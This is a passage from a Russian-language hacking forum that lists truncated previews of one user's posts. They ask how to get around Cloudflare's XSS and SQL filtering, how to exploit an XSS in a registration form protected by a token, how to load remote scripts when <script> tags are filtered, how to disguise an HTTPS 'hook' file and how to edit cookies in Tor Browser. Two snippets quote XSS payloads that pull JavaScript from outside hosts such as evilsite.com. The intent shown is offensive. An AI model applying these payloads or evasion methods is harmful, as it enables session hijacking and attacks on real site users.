Separate names with a comma.
Здравствуйте, форумчане. Почитал об этой атаке и пришла такая идея. Например есть сайт где каждую операцию нужно подтверждать вводом кода. При...
Снова вопрос о калуде.В файле php(info) есть строка real IP , он совпадает с тем что я нарыл другими способами. Но при обращении к этому айпи...
могу сделать скрипт на питоне , он нужную инфу выдернет из файла. Если она однотипная .
Наверно всех задолбал CloudFlair, блокирующий запросы с кодом xss и sql . Собственно вопрос как его можно обойти , и попадать прямиком на сайт ?...
Поискал такой плагин, который бы работал с базой кук и подставлял в браузер следущие куки по списку , но не нашел . Пользуюсь всем известным...
Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не...
Спасибо. Тоесть получается такой код <img src=foo.png onerror=document.write(<script src="https://evilsite.com/1234.js?"></script>) /> Но если...
Можете набросать пример, что бы не было глупых вопросов, ?
тоесть как то так ? "><STYLE>document.write("</SCRiPT SRC="http://ha.7676ers.org/6565.js")><STYLE>
Помогите разобратся , не могу понять как подгрузить js если нету тегов <script , алерт срабатывает при других , при таких например <img...
Спасибо за совет . Но теперь другая проблема, алерт срабатывает когда вставляеш код скрипта в поле ( отправка режется фильтром) . Тоесть юзер...
Привет всем, тестирую один сайт, в поле коментариев есть xss , нужно сделать подгрузку скрипта но такая конструкция фильтруется.,<script...
В том и дело , что нет. В конфиге есть значение network.cookie.cookieBehavior 1 . Значит он принимает куки
Кто подскажет как в тор браузере можно редактировать куки ? В настройках этот пункт скрыт. Все расширения для фаерфокс , не видят ниодного куки в...
Как возможно замаскировать под https хук файл ? Сейчас все браузеры блокируют скрипты на сайтах с https , если эти скрипты подгружаются с сайтов...
